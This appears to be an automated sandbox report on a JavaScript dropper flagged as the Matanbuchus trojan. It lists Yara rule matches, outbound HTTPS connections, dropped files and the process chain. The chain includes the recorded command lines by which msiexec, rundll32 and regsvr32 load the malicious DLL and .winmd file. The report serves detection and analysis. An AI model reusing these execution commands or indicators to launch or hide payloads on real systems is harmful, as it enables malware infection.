                  Source: unknownHTTPS traffic detected: 104.21.40.3:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49733 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49780 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49938 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 6.2.regsvr32.exe.7f6d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 6.2.regsvr32.exe.7f6d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 4.2.rundll32.exe.7f290000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 4.2.rundll32.exe.7f290000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 4.2.rundll32.exe.7f290000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 4.2.rundll32.exe.7f290000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 11.2.regsvr32.exe.7ebe0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 11.2.regsvr32.exe.7ebe0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 11.2.regsvr32.exe.7ebe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 11.2.regsvr32.exe.7ebe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 6.2.regsvr32.exe.7f6d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 6.2.regsvr32.exe.7f6d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 00000006.00000002.2015787150.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 00000006.00000002.2015787150.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 00000004.00000002.2944220363.0000000005464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 00000004.00000002.2944220363.0000000005464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Microsoft Windows Installer HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C1090-0000-0000-C000-000000000046}Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEB4E.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI67E2.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6850.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6890.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI68B0.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI68F0.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI67E2.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6C35D8604_2_6C35D860
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D9D204_2_7F2D9D20
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2B98304_2_7F2B9830
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2DF8304_2_7F2DF830
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2C37404_2_7F2C3740
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2ECDA94_2_7F2ECDA9
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2E43904_2_7F2E4390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D1EB04_2_7F2D1EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2F1EE04_2_7F2F1EE0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CFD404_2_7F2CFD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CDAC04_2_7F2CDAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2FD91B4_2_7F2FD91B
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F30160D4_2_7F30160D
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2FD5B64_2_7F2FD5B6
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2FD2284_2_7F2FD228
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F304EFE4_2_7F304EFE
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2FCEE04_2_7F2FCEE0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F31CC3C4_2_7F31CC3C
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F31CC604_2_7F31CC60
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F31CC544_2_7F31CC54
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F31CC444_2_7F31CC44
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F31CC484_2_7F31CC48
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2EAAF04_2_7F2EAAF0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CA8004_2_7F2CA800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F30C6404_2_7F30C640
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2F84904_2_7F2F8490
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2F64ED4_2_7F2F64ED
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2D9D204_2_7F2D9D20
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_7F2CC1604_2_7F2CC160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6B6351C06_2_6B6351C0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F731EE06_2_7F731EE0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F711EB06_2_7F711EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F719D206_2_7F719D20
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C1606_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71F8306_2_7F71F830
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A8006_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC41EE011_2_7EC41EE0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB011_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC29D2011_2_7EC29D20
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A80011_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2F83011_2_7EC2F830
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C16011_2_7EC1C160
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\8f08\813848\813848.winmd 394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\silver\libcurl.dll 394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7F2F13A0 appears 37 times
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7F2FF35D appears 151 times
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 7EC4F35D appears 125 times
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 7F73F35D appears 121 times
                  Source: Doc_21-04-53.jsInitial sample: Strings found which are bigger than 50
                  Source: 6.2.regsvr32.exe.7f6d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 6.2.regsvr32.exe.7f6d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 4.2.rundll32.exe.7f290000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 4.2.rundll32.exe.7f290000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 4.2.rundll32.exe.7f290000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 4.2.rundll32.exe.7f290000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 11.2.regsvr32.exe.7ebe0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 11.2.regsvr32.exe.7ebe0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 11.2.regsvr32.exe.7ebe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 11.2.regsvr32.exe.7ebe0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 6.2.regsvr32.exe.7f6d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 6.2.regsvr32.exe.7f6d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 00000006.00000002.2015787150.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 00000006.00000002.2015787150.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 00000004.00000002.2944220363.0000000005464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 00000004.00000002.2944220363.0000000005464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: classification engineClassification label: mal96.troj.evad.winJS@18/21@5/2
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML6929.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\8f08
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7028:120:WilError_03
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF189CA5C6309A7118.TMPJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js"
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B05575DDF7F0D21FAECF0BEEF6387BEE
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                  Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                  Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B05575DDF7F0D21FAECF0BEEF6387BEEJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_initJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_initJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
